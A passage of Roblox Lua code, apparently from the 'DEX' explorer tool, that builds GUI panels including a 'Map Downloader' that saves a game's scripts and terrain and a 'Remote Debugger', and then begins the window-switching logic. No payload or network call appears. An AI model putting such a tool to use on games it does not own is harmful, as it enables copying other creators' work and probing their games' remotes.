NewGuiPart88 NewGuiPart92.BackgroundColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart92.BackgroundTransparency = 0.69999998807907 NewGuiPart92.BorderSizePixel = 0 NewGuiPart92.Position = UDim2.new(0.625, 0, 0, 0) NewGuiPart92.Size = UDim2.new(0.125, 0, 1, 0) NewGuiPart93.Name = "ScriptBarRight" NewGuiPart93.Parent = NewGuiPart86 NewGuiPart93.Active = false NewGuiPart93.BackgroundColor3 = Color3.new(0.866667, 0.866667, 0.866667) NewGuiPart93.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart93.Position = UDim2.new(1, -16, 0, 40) NewGuiPart93.Size = UDim2.new(0, 16, 0, 20) NewGuiPart93.AutoButtonColor = false NewGuiPart94.Name = "Arrow Graphic" NewGuiPart94.Parent = NewGuiPart93 NewGuiPart94.BackgroundTransparency = 1 NewGuiPart94.BorderSizePixel = 0 NewGuiPart94.Position = UDim2.new(0.5, -4, 0.5, -4) NewGuiPart94.Size = UDim2.new(0, 8, 0, 8) NewGuiPart95.Name = "Graphic" NewGuiPart95.Parent = NewGuiPart94 NewGuiPart95.BackgroundColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart95.BackgroundTransparency = 0.69999998807907 NewGuiPart95.BorderSizePixel = 0 NewGuiPart95.Position = UDim2.new(0.625, 0, 0.375, 0) NewGuiPart95.Size = UDim2.new(0.125, 0, 0.25, 0) NewGuiPart96.Name = "Graphic" NewGuiPart96.Parent = NewGuiPart94 NewGuiPart96.BackgroundColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart96.BackgroundTransparency = 0.69999998807907 NewGuiPart96.BorderSizePixel = 0 NewGuiPart96.Position = UDim2.new(0.5, 0, 0.25, 0) NewGuiPart96.Size = UDim2.new(0.125, 0, 0.5, 0) NewGuiPart97.Name = "Graphic" NewGuiPart97.Parent = NewGuiPart94 NewGuiPart97.BackgroundColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart97.BackgroundTransparency = 0.69999998807907 NewGuiPart97.BorderSizePixel = 0 NewGuiPart97.Position = UDim2.new(0.375, 0, 0.125, 0) NewGuiPart97.Size = UDim2.new(0.125, 0, 0.75, 0) NewGuiPart98.Name = "Graphic" NewGuiPart98.Parent = NewGuiPart94 NewGuiPart98.BackgroundColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart98.BackgroundTransparency = 0.69999998807907 NewGuiPart98.BorderSizePixel = 0 NewGuiPart98.Position = UDim2.new(0.25, 0, 0, 0) NewGuiPart98.Size = UDim2.new(0.125, 0, 1, 0) NewGuiPart99.Name = "Clipboard" NewGuiPart99.Parent = NewGuiPart86 NewGuiPart99.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart99.BackgroundTransparency = 0.5 NewGuiPart99.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart99.Position = UDim2.new(0, 0, 0, 20) NewGuiPart99.Size = UDim2.new(0, 80, 0, 20) NewGuiPart99.Font = Enum.Font.SourceSans NewGuiPart99.FontSize = Enum.FontSize.Size14 NewGuiPart99.Text = "To Clipboard" NewGuiPart100.Name = "ScriptBar" NewGuiPart100.Parent = NewGuiPart86 NewGuiPart100.BackgroundColor3 = Color3.new(0.823529, 0.823529, 0.823529) NewGuiPart100.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart100.ClipsDescendants = true NewGuiPart100.Position = UDim2.new(0, 0, 0, 40) NewGuiPart100.Size = UDim2.new(1, -32, 0, 20) NewGuiPart101.Name = "Entry" NewGuiPart101.Parent = NewGuiPart86 NewGuiPart101.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart101.BackgroundTransparency = 1 NewGuiPart101.Size = UDim2.new(0, 100, 1, 0) NewGuiPart101.Visible = false NewGuiPart102.Name = "Button" NewGuiPart102.Parent = NewGuiPart101 NewGuiPart102.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart102.BackgroundTransparency = 0.60000002384186 NewGuiPart102.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart102.ClipsDescendants = true NewGuiPart102.Size = UDim2.new(1, 0, 1, 0) NewGuiPart102.ZIndex = 4 NewGuiPart102.Font = Enum.Font.SourceSans NewGuiPart102.FontSize = Enum.FontSize.Size12 NewGuiPart102.Text = "" NewGuiPart102.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart103.Name = "Close" NewGuiPart103.Parent = NewGuiPart101 NewGuiPart103.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart103.BackgroundTransparency = 1 NewGuiPart103.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart103.Position = UDim2.new(1, -20, 0, 0) NewGuiPart103.Size = UDim2.new(0, 20, 0, 20) NewGuiPart103.ZIndex = 4 NewGuiPart103.Font = Enum.Font.SourceSans NewGuiPart103.FontSize = Enum.FontSize.Size14 NewGuiPart103.Text = "X" NewGuiPart104.Name = "Close" NewGuiPart104.Parent = NewGuiPart82 NewGuiPart104.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart104.BackgroundTransparency = 1 NewGuiPart104.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart104.Position = UDim2.new(1, -20, 0, 0) NewGuiPart104.Size = UDim2.new(0, 20, 0, 20) NewGuiPart104.ZIndex = 5 NewGuiPart104.Font = Enum.Font.SourceSans NewGuiPart104.FontSize = Enum.FontSize.Size14 NewGuiPart104.Text = "X" NewGuiPart105.Name = "IntroFrame" NewGuiPart105.Parent = NewGuiPart1 NewGuiPart105.BackgroundColor3 = Color3.new(0.960784, 0.960784, 0.960784) NewGuiPart105.BorderSizePixel = 0 NewGuiPart105.Position = UDim2.new(1, 30, 0, 0) NewGuiPart105.Size = UDim2.new(0, 300, 1, 0) NewGuiPart105.ZIndex = 2 NewGuiPart106.Name = "Main" NewGuiPart106.Parent = NewGuiPart105 NewGuiPart106.BackgroundColor3 = Color3.new(0.960784, 0.960784, 0.960784) NewGuiPart106.BorderSizePixel = 0 NewGuiPart106.Position = UDim2.new(0, -30, 0, 0) NewGuiPart106.Size = UDim2.new(0, 30, 0, 90) NewGuiPart106.ZIndex = 2 NewGuiPart107.Name = "Title" NewGuiPart107.Parent = NewGuiPart105 NewGuiPart107.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart107.BackgroundTransparency = 1 NewGuiPart107.Position = UDim2.new(0, 100, 0, 150) NewGuiPart107.Size = UDim2.new(0, 100, 0, 60) NewGuiPart107.ZIndex = 2 NewGuiPart107.Font = Enum.Font.SourceSansBold NewGuiPart107.FontSize = Enum.FontSize.Size60 NewGuiPart107.Text = "DEX" NewGuiPart107.TextWrapped = true NewGuiPart108.Name = "Version" NewGuiPart108.Parent = NewGuiPart105 NewGuiPart108.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart108.BackgroundTransparency = 1 NewGuiPart108.Position = UDim2.new(0, 100, 0, 210) NewGuiPart108.Size = UDim2.new(0, 100, 0, 30) NewGuiPart108.ZIndex = 2 NewGuiPart108.Font = Enum.Font.SourceSansBold NewGuiPart108.FontSize = Enum.FontSize.Size28 NewGuiPart108.Text = "V2.0.0" NewGuiPart108.TextWrapped = true NewGuiPart109.Name = "Creator" NewGuiPart109.Parent = NewGuiPart105 NewGuiPart109.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart109.BackgroundTransparency = 1 NewGuiPart109.Position = UDim2.new(0, 80, 0, 300) NewGuiPart109.Size = UDim2.new(0, 140, 0, 30) NewGuiPart109.ZIndex = 2 NewGuiPart109.Font = Enum.Font.SourceSansBold NewGuiPart109.FontSize = Enum.FontSize.Size28 NewGuiPart109.Text = "Raspberry Pi , Script Made By Advancedev" NewGuiPart109.TextWrapped = true NewGuiPart110.Name = "Slant" NewGuiPart110.Parent = NewGuiPart105 NewGuiPart110.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart110.BackgroundTransparency = 1 NewGuiPart110.Position = UDim2.new(0, -30, 0, 90) NewGuiPart110.Rotation = 180 NewGuiPart110.Size = UDim2.new(0, 30, 0, 30) NewGuiPart110.ZIndex = 2 NewGuiPart110.Image = "rbxassetid://474172996" NewGuiPart110.ImageColor3 = Color3.new(0.960784, 0.960784, 0.960784) NewGuiPart111.Name = "SaveMapWindow" NewGuiPart111.Parent = NewGuiPart1 NewGuiPart111.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart111.BackgroundTransparency = 0.10000000149012 NewGuiPart111.BorderColor3 = Color3.new(0.74902, 0.74902, 0.74902) NewGuiPart111.Position = UDim2.new(1, 0, 0, 0) NewGuiPart111.Size = UDim2.new(0, 300, 1, 0) NewGuiPart112.Name = "Header" NewGuiPart112.Parent = NewGuiPart111 NewGuiPart112.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart112.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart112.Size = UDim2.new(1, 0, 0, 17) NewGuiPart113.Parent = NewGuiPart112 NewGuiPart113.BackgroundTransparency = 1 NewGuiPart113.Position = UDim2.new(0, 4, 0, 0) NewGuiPart113.Size = UDim2.new(1, -4, 1, 0) NewGuiPart113.Font = Enum.Font.SourceSans NewGuiPart113.FontSize = Enum.FontSize.Size14 NewGuiPart113.Text = "Map Downloader" NewGuiPart113.TextColor3 = Color3.new(0, 0, 0) NewGuiPart113.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart114.Name = "MapSettings" NewGuiPart114.Parent = NewGuiPart111 NewGuiPart114.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart114.BackgroundTransparency = 1 NewGuiPart114.Position = UDim2.new(0, 0, 0, 200) NewGuiPart114.Size = UDim2.new(1, 0, 0, 240) NewGuiPart115.Name = "Terrain" NewGuiPart115.Parent = NewGuiPart114 NewGuiPart115.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart115.BackgroundTransparency = 1 NewGuiPart115.Position = UDim2.new(0, 0, 0, 60) NewGuiPart115.Size = UDim2.new(1, 0, 0, 60) NewGuiPart116.Name = "SName" NewGuiPart116.Parent = NewGuiPart115 NewGuiPart116.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart116.BackgroundTransparency = 1 NewGuiPart116.Position = UDim2.new(0, 10, 0, 0) NewGuiPart116.Size = UDim2.new(1, -20, 0, 30) NewGuiPart116.Font = Enum.Font.SourceSans NewGuiPart116.FontSize = Enum.FontSize.Size18 NewGuiPart116.Text = "Save Terrain" NewGuiPart116.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart117.Name = "Status" NewGuiPart117.Parent = NewGuiPart115 NewGuiPart117.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart117.BackgroundTransparency = 1 NewGuiPart117.Position = UDim2.new(0, 60, 0, 30) NewGuiPart117.Size = UDim2.new(0, 50, 0, 15) NewGuiPart117.Font = Enum.Font.SourceSans NewGuiPart117.FontSize = Enum.FontSize.Size18 NewGuiPart117.Text = "Off" NewGuiPart117.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart118.Name = "Change" NewGuiPart118.Parent = NewGuiPart115 NewGuiPart118.BackgroundColor3 = Color3.new(0.862745, 0.862745, 0.862745) NewGuiPart118.BorderSizePixel = 0 NewGuiPart118.Position = UDim2.new(0, 10, 0, 30) NewGuiPart118.Size = UDim2.new(0, 40, 0, 15) NewGuiPart118.Font = Enum.Font.SourceSans NewGuiPart118.FontSize = Enum.FontSize.Size14 NewGuiPart118.Text = "" NewGuiPart119.Name = "OnBar" NewGuiPart119.Parent = NewGuiPart118 NewGuiPart119.BackgroundColor3 = Color3.new(0, 0.576471, 0.862745) NewGuiPart119.BorderSizePixel = 0 NewGuiPart119.Size = UDim2.new(0, 0, 0, 15) NewGuiPart119.Font = Enum.Font.SourceSans NewGuiPart119.FontSize = Enum.FontSize.Size14 NewGuiPart119.Text = "" NewGuiPart120.Name = "Bar" NewGuiPart120.Parent = NewGuiPart118 NewGuiPart120.BackgroundColor3 = Color3.new(0, 0, 0) NewGuiPart120.BorderSizePixel = 0 NewGuiPart120.ClipsDescendants = true NewGuiPart120.Position = UDim2.new(0, -2, 0, -2) NewGuiPart120.Size = UDim2.new(0, 10, 0, 19) NewGuiPart120.Font = Enum.Font.SourceSans NewGuiPart120.FontSize = Enum.FontSize.Size14 NewGuiPart120.Text = "" NewGuiPart121.Name = "Lighting" NewGuiPart121.Parent = NewGuiPart114 NewGuiPart121.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart121.BackgroundTransparency = 1 NewGuiPart121.Position = UDim2.new(0, 0, 0, 120) NewGuiPart121.Size = UDim2.new(1, 0, 0, 60) NewGuiPart122.Name = "SName" NewGuiPart122.Parent = NewGuiPart121 NewGuiPart122.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart122.BackgroundTransparency = 1 NewGuiPart122.Position = UDim2.new(0, 10, 0, 0) NewGuiPart122.Size = UDim2.new(1, -20, 0, 30) NewGuiPart122.Font = Enum.Font.SourceSans NewGuiPart122.FontSize = Enum.FontSize.Size18 NewGuiPart122.Text = "Lighting Properties" NewGuiPart122.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart123.Name = "Status" NewGuiPart123.Parent = NewGuiPart121 NewGuiPart123.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart123.BackgroundTransparency = 1 NewGuiPart123.Position = UDim2.new(0, 60, 0, 30) NewGuiPart123.Size = UDim2.new(0, 50, 0, 15) NewGuiPart123.Font = Enum.Font.SourceSans NewGuiPart123.FontSize = Enum.FontSize.Size18 NewGuiPart123.Text = "Off" NewGuiPart123.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart124.Name = "Change" NewGuiPart124.Parent = NewGuiPart121 NewGuiPart124.BackgroundColor3 = Color3.new(0.862745, 0.862745, 0.862745) NewGuiPart124.BorderSizePixel = 0 NewGuiPart124.Position = UDim2.new(0, 10, 0, 30) NewGuiPart124.Size = UDim2.new(0, 40, 0, 15) NewGuiPart124.Font = Enum.Font.SourceSans NewGuiPart124.FontSize = Enum.FontSize.Size14 NewGuiPart124.Text = "" NewGuiPart125.Name = "OnBar" NewGuiPart125.Parent = NewGuiPart124 NewGuiPart125.BackgroundColor3 = Color3.new(0, 0.576471, 0.862745) NewGuiPart125.BorderSizePixel = 0 NewGuiPart125.Size = UDim2.new(0, 0, 0, 15) NewGuiPart125.Font = Enum.Font.SourceSans NewGuiPart125.FontSize = Enum.FontSize.Size14 NewGuiPart125.Text = "" NewGuiPart126.Name = "Bar" NewGuiPart126.Parent = NewGuiPart124 NewGuiPart126.BackgroundColor3 = Color3.new(0, 0, 0) NewGuiPart126.BorderSizePixel = 0 NewGuiPart126.ClipsDescendants = true NewGuiPart126.Position = UDim2.new(0, -2, 0, -2) NewGuiPart126.Size = UDim2.new(0, 10, 0, 19) NewGuiPart126.Font = Enum.Font.SourceSans NewGuiPart126.FontSize = Enum.FontSize.Size14 NewGuiPart126.Text = "" NewGuiPart127.Name = "CameraInstances" NewGuiPart127.Parent = NewGuiPart114 NewGuiPart127.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart127.BackgroundTransparency = 1 NewGuiPart127.Position = UDim2.new(0, 0, 0, 180) NewGuiPart127.Size = UDim2.new(1, 0, 0, 60) NewGuiPart128.Name = "SName" NewGuiPart128.Parent = NewGuiPart127 NewGuiPart128.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart128.BackgroundTransparency = 1 NewGuiPart128.Position = UDim2.new(0, 10, 0, 0) NewGuiPart128.Size = UDim2.new(1, -20, 0, 30) NewGuiPart128.Font = Enum.Font.SourceSans NewGuiPart128.FontSize = Enum.FontSize.Size18 NewGuiPart128.Text = "Camera Instances" NewGuiPart128.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart129.Name = "Status" NewGuiPart129.Parent = NewGuiPart127 NewGuiPart129.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart129.BackgroundTransparency = 1 NewGuiPart129.Position = UDim2.new(0, 60, 0, 30) NewGuiPart129.Size = UDim2.new(0, 50, 0, 15) NewGuiPart129.Font = Enum.Font.SourceSans NewGuiPart129.FontSize = Enum.FontSize.Size18 NewGuiPart129.Text = "Off" NewGuiPart129.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart130.Name = "Change" NewGuiPart130.Parent = NewGuiPart127 NewGuiPart130.BackgroundColor3 = Color3.new(0.862745, 0.862745, 0.862745) NewGuiPart130.BorderSizePixel = 0 NewGuiPart130.Position = UDim2.new(0, 10, 0, 30) NewGuiPart130.Size = UDim2.new(0, 40, 0, 15) NewGuiPart130.Font = Enum.Font.SourceSans NewGuiPart130.FontSize = Enum.FontSize.Size14 NewGuiPart130.Text = "" NewGuiPart131.Name = "OnBar" NewGuiPart131.Parent = NewGuiPart130 NewGuiPart131.BackgroundColor3 = Color3.new(0, 0.576471, 0.862745) NewGuiPart131.BorderSizePixel = 0 NewGuiPart131.Size = UDim2.new(0, 0, 0, 15) NewGuiPart131.Font = Enum.Font.SourceSans NewGuiPart131.FontSize = Enum.FontSize.Size14 NewGuiPart131.Text = "" NewGuiPart132.Name = "Bar" NewGuiPart132.Parent = NewGuiPart130 NewGuiPart132.BackgroundColor3 = Color3.new(0, 0, 0) NewGuiPart132.BorderSizePixel = 0 NewGuiPart132.ClipsDescendants = true NewGuiPart132.Position = UDim2.new(0, -2, 0, -2) NewGuiPart132.Size = UDim2.new(0, 10, 0, 19) NewGuiPart132.Font = Enum.Font.SourceSans NewGuiPart132.FontSize = Enum.FontSize.Size14 NewGuiPart132.Text = "" NewGuiPart133.Name = "Scripts" NewGuiPart133.Parent = NewGuiPart114 NewGuiPart133.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart133.BackgroundTransparency = 1 NewGuiPart133.Size = UDim2.new(1, 0, 0, 60) NewGuiPart134.Name = "SName" NewGuiPart134.Parent = NewGuiPart133 NewGuiPart134.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart134.BackgroundTransparency = 1 NewGuiPart134.Position = UDim2.new(0, 10, 0, 0) NewGuiPart134.Size = UDim2.new(1, -20, 0, 30) NewGuiPart134.Font = Enum.Font.SourceSans NewGuiPart134.FontSize = Enum.FontSize.Size18 NewGuiPart134.Text = "Save Scripts" NewGuiPart134.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart135.Name = "Status" NewGuiPart135.Parent = NewGuiPart133 NewGuiPart135.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart135.BackgroundTransparency = 1 NewGuiPart135.Position = UDim2.new(0, 60, 0, 30) NewGuiPart135.Size = UDim2.new(0, 50, 0, 15) NewGuiPart135.Font = Enum.Font.SourceSans NewGuiPart135.FontSize = Enum.FontSize.Size18 NewGuiPart135.Text = "Off" NewGuiPart135.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart136.Name = "Change" NewGuiPart136.Parent = NewGuiPart133 NewGuiPart136.BackgroundColor3 = Color3.new(0.862745, 0.862745, 0.862745) NewGuiPart136.BorderSizePixel = 0 NewGuiPart136.Position = UDim2.new(0, 10, 0, 30) NewGuiPart136.Size = UDim2.new(0, 40, 0, 15) NewGuiPart136.Font = Enum.Font.SourceSans NewGuiPart136.FontSize = Enum.FontSize.Size14 NewGuiPart136.Text = "" NewGuiPart137.Name = "OnBar" NewGuiPart137.Parent = NewGuiPart136 NewGuiPart137.BackgroundColor3 = Color3.new(0, 0.576471, 0.862745) NewGuiPart137.BorderSizePixel = 0 NewGuiPart137.Size = UDim2.new(0, 0, 0, 15) NewGuiPart137.Font = Enum.Font.SourceSans NewGuiPart137.FontSize = Enum.FontSize.Size14 NewGuiPart137.Text = "" NewGuiPart138.Name = "Bar" NewGuiPart138.Parent = NewGuiPart136 NewGuiPart138.BackgroundColor3 = Color3.new(0, 0, 0) NewGuiPart138.BorderSizePixel = 0 NewGuiPart138.ClipsDescendants = true NewGuiPart138.Position = UDim2.new(0, -2, 0, -2) NewGuiPart138.Size = UDim2.new(0, 10, 0, 19) NewGuiPart138.Font = Enum.Font.SourceSans NewGuiPart138.FontSize = Enum.FontSize.Size14 NewGuiPart138.Text = "" NewGuiPart139.Name = "ToSave" NewGuiPart139.Parent = NewGuiPart111 NewGuiPart139.BackgroundTransparency = 1 NewGuiPart139.Position = UDim2.new(0, 0, 0, 17) NewGuiPart139.Size = UDim2.new(1, 0, 0, 20) NewGuiPart139.Font = Enum.Font.SourceSans NewGuiPart139.FontSize = Enum.FontSize.Size18 NewGuiPart139.Text = "To Save" NewGuiPart139.TextColor3 = Color3.new(0, 0, 0) NewGuiPart140.Name = "CopyList" NewGuiPart140.Parent = NewGuiPart111 NewGuiPart140.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart140.BackgroundTransparency = 0.80000001192093 NewGuiPart140.Position = UDim2.new(0, 0, 0, 37) NewGuiPart140.Size = UDim2.new(1, 0, 0, 163) NewGuiPart141.Name = "Bottom" NewGuiPart141.Parent = NewGuiPart111 NewGuiPart141.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart141.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart141.Position = UDim2.new(0, 0, 1, -50) NewGuiPart141.Size = UDim2.new(1, 0, 0, 50) NewGuiPart142.Parent = NewGuiPart141 NewGuiPart142.BackgroundTransparency = 1 NewGuiPart142.Position = UDim2.new(0, 4, 0, 0) NewGuiPart142.Size = UDim2.new(1, -4, 1, 0) NewGuiPart142.Font = Enum.Font.SourceSans NewGuiPart142.FontSize = Enum.FontSize.Size14 NewGuiPart142.Text = "After the map saves, open a new place on studio, then right click Lighting and \"Insert from file...\", then select your file and run the unpacker script inside the folder." NewGuiPart142.TextColor3 = Color3.new(0, 0, 0) NewGuiPart142.TextWrapped = true NewGuiPart142.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart142.TextYAlignment = Enum.TextYAlignment.Top NewGuiPart143.Name = "Save" NewGuiPart143.Parent = NewGuiPart111 NewGuiPart143.BackgroundColor3 = Color3.new(0.941177, 0.941177, 0.941177) NewGuiPart143.BackgroundTransparency = 0.80000001192093 NewGuiPart143.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart143.Position = UDim2.new(0, 0, 1, -80) NewGuiPart143.Size = UDim2.new(1, 0, 0, 30) NewGuiPart143.Font = Enum.Font.SourceSans NewGuiPart143.FontSize = Enum.FontSize.Size18 NewGuiPart143.Text = "Save" NewGuiPart144.Name = "FileName" NewGuiPart144.Parent = NewGuiPart111 NewGuiPart144.BackgroundColor3 = Color3.new(0.941177, 0.941177, 0.941177) NewGuiPart144.BackgroundTransparency = 0.60000002384186 NewGuiPart144.Position = UDim2.new(0, 0, 1, -105) NewGuiPart144.Size = UDim2.new(1, 0, 0, 25) NewGuiPart144.Font = Enum.Font.SourceSans NewGuiPart144.FontSize = Enum.FontSize.Size18 NewGuiPart144.Text = "PlaceName" NewGuiPart144.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart145.Name = "Entry" NewGuiPart145.Parent = NewGuiPart111 NewGuiPart145.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart145.BackgroundTransparency = 1 NewGuiPart145.Size = UDim2.new(1, 0, 0, 22) NewGuiPart145.Visible = false NewGuiPart146.Name = "Change" NewGuiPart146.Parent = NewGuiPart145 NewGuiPart146.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart146.BackgroundTransparency = 0.60000002384186 NewGuiPart146.Position = UDim2.new(0, 10, 0, 1) NewGuiPart146.Size = UDim2.new(0, 20, 0, 20) NewGuiPart146.ZIndex = 2 NewGuiPart146.Font = Enum.Font.SourceSans NewGuiPart146.FontSize = Enum.FontSize.Size18 NewGuiPart146.Text = "" NewGuiPart146.TextColor3 = Color3.new(1, 1, 1) NewGuiPart147.Name = "enabled" NewGuiPart147.Parent = NewGuiPart146 NewGuiPart147.BackgroundColor3 = Color3.new(0.380392, 0.380392, 0.380392) NewGuiPart147.BackgroundTransparency = 0.40000000596046 NewGuiPart147.BorderSizePixel = 0 NewGuiPart147.Position = UDim2.new(0, 3, 0, 3) NewGuiPart147.Size = UDim2.new(0, 14, 0, 14) NewGuiPart147.Font = Enum.Font.SourceSans NewGuiPart147.FontSize = Enum.FontSize.Size14 NewGuiPart147.Text = "" NewGuiPart148.Name = "Info" NewGuiPart148.Parent = NewGuiPart145 NewGuiPart148.BackgroundTransparency = 1 NewGuiPart148.Position = UDim2.new(0, 40, 0, 0) NewGuiPart148.Size = UDim2.new(1, -40, 0, 22) NewGuiPart148.Font = Enum.Font.SourceSans NewGuiPart148.FontSize = Enum.FontSize.Size18 NewGuiPart148.Text = "Workspace" NewGuiPart148.TextColor3 = Color3.new(0, 0, 0) NewGuiPart148.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart149.Name = "RemoteDebugWindow" NewGuiPart149.Parent = NewGuiPart1 NewGuiPart149.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart149.BackgroundTransparency = 0.10000000149012 NewGuiPart149.BorderColor3 = Color3.new(0.74902, 0.74902, 0.74902) NewGuiPart149.Position = UDim2.new(1, 0, 0, 0) NewGuiPart149.Size = UDim2.new(0, 300, 1, 0) NewGuiPart161.Name = "GetSetting" NewGuiPart161.Parent = NewGuiPart149 NewGuiPart161.Archivable = true NewGuiPart150.Name = "Header" NewGuiPart150.Parent = NewGuiPart149 NewGuiPart150.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart150.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart150.Size = UDim2.new(1, 0, 0, 17) NewGuiPart151.Parent = NewGuiPart150 NewGuiPart151.BackgroundTransparency = 1 NewGuiPart151.Position = UDim2.new(0, 4, 0, 0) NewGuiPart151.Size = UDim2.new(1, -4, 1, 0) NewGuiPart151.Font = Enum.Font.SourceSans NewGuiPart151.FontSize = Enum.FontSize.Size14 NewGuiPart151.Text = "Remote Debugger" NewGuiPart151.TextColor3 = Color3.new(0, 0, 0) NewGuiPart151.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart152.Name = "Desc" NewGuiPart152.Parent = NewGuiPart149 NewGuiPart152.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart152.BackgroundTransparency = 1 NewGuiPart152.Position = UDim2.new(0, 0, 0, 20) NewGuiPart152.Size = UDim2.new(1, 0, 0, 40) NewGuiPart152.Font = Enum.Font.SourceSans NewGuiPart152.FontSize = Enum.FontSize.Size32 NewGuiPart152.Text = "Have fun with remotes" NewGuiPart152.TextWrapped = true return NewGuiPart1 end local D_E_X = CreateGui() D_E_X.Parent = game:GetService("Players").LocalPlayer.PlayerGui spawn(function() local Gui = D_E_X local IntroFrame = Gui:WaitForChild("IntroFrame") local SideMenu = Gui:WaitForChild("SideMenu") local OpenToggleButton = Gui:WaitForChild("Toggle") local CloseToggleButton = SideMenu:WaitForChild("Toggle") local OpenScriptEditorButton = SideMenu:WaitForChild("OpenScriptEditor") local ScriptEditor = Gui:WaitForChild("ScriptEditor") local SlideOut = SideMenu:WaitForChild("SlideOut") local SlideFrame = SlideOut:WaitForChild("SlideFrame") local Slant = SideMenu:WaitForChild("Slant") local ExplorerButton = SlideFrame:WaitForChild("Explorer") local SettingsButton = SlideFrame:WaitForChild("Settings") local SelectionBox = Instance.new("SelectionBox") SelectionBox.Parent = Gui local ExplorerPanel = Gui:WaitForChild("ExplorerPanel") local PropertiesFrame = Gui:WaitForChild("PropertiesFrame") local SaveMapWindow = Gui:WaitForChild("SaveMapWindow") local RemoteDebugWindow = Gui:WaitForChild("RemoteDebugWindow") local SettingsPanel = Gui:WaitForChild("SettingsPanel") local SettingsListener = SettingsPanel:WaitForChild("GetSetting") local SettingTemplate = SettingsPanel:WaitForChild("SettingTemplate") local SettingList = SettingsPanel:WaitForChild("SettingList") local SaveMapCopyList = SaveMapWindow:WaitForChild("CopyList") local SaveMapSettingFrame = SaveMapWindow:WaitForChild("MapSettings") local SaveMapName = SaveMapWindow:WaitForChild("FileName") local SaveMapButton = SaveMapWindow:WaitForChild("Save") local SaveMapCopyTemplate = SaveMapWindow:WaitForChild("Entry") local SaveMapSettings = { CopyWhat = { Workspace = true, Lighting = true, ReplicatedStorage = true, ReplicatedFirst = true, StarterPack = true, StarterGui = true, StarterPlayer = true }, SaveScripts = true, SaveTerrain = true, LightingProperties = true, CameraInstances = true } local TotallyNotSelectionChanged = ExplorerPanel:WaitForChild("TotallyNotSelectionChanged") local TotallyNotGetSelection = ExplorerPanel:WaitForChild("TotallyNotGetSelection") local TotallyNotSetSelection = ExplorerPanel:WaitForChild("TotallyNotSetSelection") local Player = game:GetService("Players").LocalPlayer local Mouse = Player:GetMouse() local CurrentWindow = "Nothing c:" local Windows = { Explorer = { ExplorerPanel, PropertiesFrame }, Settings = {SettingsPanel}, SaveMap = {SaveMapWindow}, Remotes = {RemoteDebugWindow} } function switchWindows(wName,over) if CurrentWindow == wName and not over then return end local count = 0 for i,v in pairs(Windows) do count = 0 if i ~= wName then for _,c in pairs(v) do c:TweenPosition(UDim2.new(1, 30, count * 0.5, count * 36), "Out", "Quad", 0.5, true) count = count + 1 end end end count = 0 if Windows[wName] then for _,c in pairs(Windows[wName]) do c:TweenPosition(UDim2.new(1, -300, count * 0.5, count * 36), "Out", "Quad", 0.5, true) count = count + 1 end end if wName ~= "Nothing c:" then CurrentWindow = wName for i,v in pairs(SlideFrame:GetChildren()) do v.BackgroundTransparency = 1 v.Icon.ImageColor3 = Color3.new(70/255, 70/255, 70/255) end if SlideFrame:FindFirstChild(wName) then SlideFrame[wName].BackgroundTransparency = 0.5 SlideFrame[wName].Icon.ImageColor3 = Color3.new(0,0,0) end end end function toggleDex(on) if on then 